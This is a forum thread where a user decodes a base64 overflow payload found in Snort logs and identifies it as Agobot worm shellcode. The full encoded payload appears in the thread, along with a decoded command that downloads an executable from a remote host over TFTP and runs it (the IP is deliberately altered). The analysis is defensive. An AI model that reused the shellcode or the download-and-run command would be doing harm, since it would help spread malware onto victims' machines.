Short exploit investigation...

[iago]

I was looking at my Snort logs (although this would also be seen in Apache's logs) and found this string repeated many times, more each day for the last 4 days, showing up as an attempted overflow:

Code: [Select]

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDE0Mi4xNjEuNjYuNDggR0VUIHd1YW1rb3AuZXhlJnN0YXJ0IHd1YW1rb3AuZXhlJmV4aXQAQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQiMKAwgA+A8BAPgP
This was coming from all over, and looks like an exploit.  Something that doesn't belong.  So I whip out my trusty base64 decoder and run it through (because a lot of it is in hex, I ran it through strings to pull out any strings):

Code: [Select]

AAAAAAAAAAAAAAAAAAAAAAAAA
ÄTòÿÿüèF
ëã.I
Âëô;T$
Ã1Àd
h<_1ö`Vë
hïÎà`h
Wÿçèîÿÿÿcmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#

What is looks like is some shellcode that runs the command:
cmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit

Which is:
Run cmd, with the command tftp (an ftp client) which gets wuamkop.exe, runs it, and ends the program.  (NOTE: I added the x at the end of the IP, just to prevent potential mishaps with people running that command and getting infected )

A quick google on that filename turns up:
http://www.liutilities.com/products/wintaskspro/processlibrary/wuamkop/

Which says:
Process File: wuamkop or wuamkop.exe
Process Name: WORM_AGOBOT Variant

Conclusion: It's a AGOBOT worm/trojan spreading itself using a web server vulnerability.  I'm not sure which server is vulnerable but, being a .exe, it's not mine (it's a Windows worm)

Hope that somebody found that neresting.

[Quik]

There was a post on bugtraq about this, maybe security-basics. Let me see if I can find the corresponding thread.

[EDIT]: Nevermind, it was on Incidents, and there is no online log of those threads as far as I can find. It does seem like there's a new Windows server exploit like this going around.

[iago]

It was on "incidents".  And that is a sdbot variant, this is agobot.  Same exploit, though

[iago]

Here are a couple graphs of this attack:

The number of times it hit me, by hour:
http://www.javaop.com/~iago/worm_analysis_byhour.html

The number of times it hit me, by day:
http://www.javaop.com/~iago/worm_analysis_byday.html

As you can see, it's only really been around since the 6th, and it looks like it already peaked.  In another week, I'll see how it looks again.

[deadly7]

Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.

[Krazed]

Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.

Well, it's spreading itself along the internet. Most likely just selecting random IPs along a specified subnet, and attempting to exploit each machine, then skipping to the next.

[iago]

Yeah, I'm assuming it's just a plain worm.  It randomly either picks an ip or, like Archon said, scans a subnet.

[mynameistmp]

What was your command-string that you used to run that through your decoder ?

[iago]

It was pretty obvious that it was base64, and I discovered the easy way to decode that is mimencode -u.  I think you can also use uuencode somehow.

[GameSnake]

Interesting, is this an exploit in 1.02+?

How does the virus get to the point where it can reach the servers FTP - and why would I care if I was on Linux Red Hat Apache, I can control acess can't I, how does it exploit me. It uploads an exe and runs it too (right?).

Just curious becuase I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.

[iago]

Interesting, is this an exploit in 1.02+?

How does the virus get to the point where it can reach the servers FTP - and why would I care if I was on Linux Red Hat Apache, I can control acess can't I, how does it exploit me. It uploads an exe and runs it too (right?).

Just curious becuase I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.

You're making very little sense, but anyway, it's an IIS worm so Apache isn't affected.  I don't know what you mean by "1.02", Apache is vulnerable up to "1.3.26" or so.  There aren't any .exe's on Red Hat, so I wouldn't worry about that. 

[GameSnake]

nvm issued cleared up